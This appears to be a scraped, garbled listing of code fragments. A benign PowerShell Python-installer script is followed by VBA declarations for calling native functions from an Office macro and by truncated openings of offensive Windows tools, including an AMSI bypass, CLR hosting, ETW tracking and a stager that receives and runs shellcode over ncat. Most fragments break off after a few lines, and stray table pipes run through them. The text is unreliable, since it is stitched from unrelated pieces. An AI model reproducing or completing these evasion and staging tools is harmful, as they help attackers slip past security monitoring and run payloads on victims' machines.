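# Downloads the Python 3.7.0 Windows installer into C:/temp and runs it
# silently for the current user only (InstallAllUsers=0), prepending it to
# PATH and skipping the test suite.

# -Force makes this a no-op when the directory already exists instead of
# emitting an error and continuing.
New-Item -ItemType Directory -Path "C:/temp/" -Force | Out-Null

# Force TLS 1.2 for the download (older PowerShell/.NET builds may otherwise
# negotiate a weaker protocol).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$installer = "c:/temp/python-3.7.0.exe"
# -ErrorAction Stop: abort if the download fails rather than falling through
# to execute a missing or partially written file.
Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.7.0/python-3.7.0.exe" -OutFile $installer -ErrorAction Stop

# Verify the installer against the SHA256 value published on python.org
# before executing it. The placeholder below is NOT a real hash and must be
# replaced with the published value; until then the script fails closed.
$expectedSha256 = "<REPLACE-WITH-PUBLISHED-SHA256-OF-python-3.7.0.exe>"
$actualSha256 = (Get-FileHash -Path $installer -Algorithm SHA256).Hash
if ($actualSha256 -ne $expectedSha256) {
    throw "Checksum mismatch for $installer (expected $expectedSha256, got $actualSha256)"
}

# -Wait so the caller can rely on the install having finished when the
# script returns.
Start-Process -FilePath $installer -ArgumentList "/quiet", "InstallAllUsers=0", "PrependPath=1", "Include_test=0" -Wait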
' Win32/OLE imports that together let VBA invoke a native function by address:
' DispCallFunc calls the function at a caller-supplied address with a
' caller-described calling convention, argument type list and argument values;
' LoadLibraryA/GetProcAddress resolve the address of an exported routine from
' a module name and export name. This Declare trio in an Office macro is a
' well-known indicator for macro analysis and detection tooling.
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long | |
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr | |
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
' Calling-convention code; presumably passed as DispCallFunc's CallConv
' argument (the caller is not visible here).
Const CC_STDCALL = 4 | |
' Module-level scratch arrays, 64 entries each. Their element types match
' DispCallFunc's paTypes (Integer) and paValues (LongPtr) parameters, so they
' are likely the per-argument type codes and value pointers for a call --
' confirm against the calling Sub.
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr | |
Sub SayHello() | |
// memBruteforce.cpp by aaaddress1@chroot.org | |
// brute-force search for loaded modules in memory | |
// rewrite from https://www.exploit-db.com/exploits/45293 | |
#include <Windows.h> | |
#include <iostream> | |
#pragma warning(disable:4996) | |
bool isMemExist(size_t addr) { | |
int retv; | |
__asm { |
// Exception-Based AMSI Bypass | |
// by aaaddress1@chroot.org | |
#include <amsi.h> | |
#include <iostream> | |
#include <Windows.h> | |
#pragma comment(lib, "amsi.lib") | |
#pragma comment(lib, "ole32.lib") | |
#pragma warning( disable : 4996 ) | |
#define AMSIPROJECTNAME L"scanner" |
// CLR Hosting, by aaaddress1@chroot.org | |
// | |
// a rewritten edition targeting the .NET (4+) COM hosting interface | |
// original from github.com/etormadiv/HostingCLR | |
// & blog.xpnsec.com/hiding-your-dotnet-etw | |
// | |
// this PoC supports the following .NET entry: | |
// >>>> static void Main(string[] args); | |
// | |
#include <stdio.h> |
import time | |
import etw | |
import etw.evntrace | |
import sys | |
import argparse | |
import threading | |
class RundownDotNetETW(etw.ETW): | |
def __init__(self, verbose, high_risk_only): |
// ETW CLR Tracker, by aaaddress1@chroot.org | |
// rewrite from post "Hiding your .NET - ETW" | |
// URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/ | |
#define AssemblyDCStart_V1 155 | |
#define AssemblyLoad_V1 154 | |
#define MethodLoadVerbose_V1 143 | |
#include <windows.h> | |
#include <stdio.h> | |
#include <wbemidl.h> |
// simple stager, by aaaddress1@chroot.org | |
// using ncat to send shellcode payload, recv & execute. | |
#include <WS2tcpip.h> | |
#include <stdio.h> | |
#include <shlobj.h> | |
#include <Windows.h> | |
#include <shlwapi.h> | |
#include <winsock2.h> | |
#pragma warning(disable:4996) | |
#pragma comment(lib, "ws2_32.lib") |
// [Experiment] switch IME to Traditional Chinese | |
// $ g++ -m32 -static inputLockToZhTW.cpp && a | |
// tested on the League of Legends (TW) client, but the requests were ignored :( | |
// by aaaddress1@chroot.org | |
#include <windows.h> | |
#include <iostream> | |
int main(void) { | |
for (char buf[64]; ; Sleep(150)) { | |
GetWindowTextA(GetForegroundWindow(), buf, sizeof(buf)); | |
// once found that LOL client is on the top, and send IME change requests |
/* | |
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
* | |
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
* | |
* Please visit m1racles.com for more information. | |
* | |
* Licensed under the MIT license. | |
*/ |